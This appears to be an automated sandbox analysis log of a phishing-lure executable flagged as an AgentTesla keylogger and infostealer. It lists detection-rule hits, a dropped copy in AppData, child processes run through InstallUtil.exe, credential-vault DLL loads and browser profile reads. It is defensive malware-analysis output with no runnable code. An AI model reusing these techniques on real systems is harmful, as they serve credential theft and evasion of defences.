                    Source: 3.2.Hxfzsthbd.exe.3600ce8.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 3.2.Hxfzsthbd.exe.3600ce8.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 2.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 3.2.Hxfzsthbd.exe.3600ce8.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 3.2.Hxfzsthbd.exe.3600ce8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.4069550.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.4069550.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, BOT85cX15ubIHapB5PR.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, BOT85cX15ubIHapB5PR.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, BOT85cX15ubIHapB5PR.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.42333d8.4.raw.unpack, BOT85cX15ubIHapB5PR.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@2/2
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeFile created: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: Kuwait Offer48783929281-BZ2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Kuwait Offer48783929281-BZ2.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Kuwait Offer48783929281-BZ2.exeReversingLabs: Detection: 34%
                    Source: Kuwait Offer48783929281-BZ2.exeVirustotal: Detection: 27%
                    Source: Kuwait Offer48783929281-BZ2.exeString found in binary or memory: -Start from the license
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeFile read: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe "C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe"
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe "C:\Users\user\AppData\Roaming\Hxfzsthbd.exe"
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe "C:\Users\user\AppData\Roaming\Hxfzsthbd.exe"
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
